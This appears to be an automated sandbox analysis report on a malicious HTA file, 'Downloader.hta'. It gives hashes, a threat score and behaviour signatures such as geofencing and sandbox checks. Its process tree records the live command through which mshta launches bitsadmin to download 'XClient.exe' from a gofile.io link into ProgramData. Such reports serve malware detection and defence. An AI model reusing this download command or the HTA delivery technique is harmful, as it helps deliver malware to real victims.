Analysis

  • max time kernel
    436s
  • max time network
    438s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27-08-2024 07:33

General

  • Target

    Downloader.hta

  • Size

    839B

  • MD5

    c8d31f50c426babbe89f9e683cf2c811

  • SHA1

    f707753871857aec319cf41b8f3f9739e29e9b11

  • SHA256

    ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e

  • SHA512

    e1f459921a084ba9f2f8d2c78666f303a1193c8dda06bb245c1587d93af1ea86af3cc79f0fc813bc4cbfebaf4af6e8073c2fbd2bbf53bc83ecbd3c9b4fe5b5cd

Score
8/10

Malware Config

Signatures

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3296
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://gofile.io/d/G6Wixe C:\ProgramData\XClient.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:4784
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4856
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3816

Network

MITRE ATT&CK Enterprise v15

Downloads
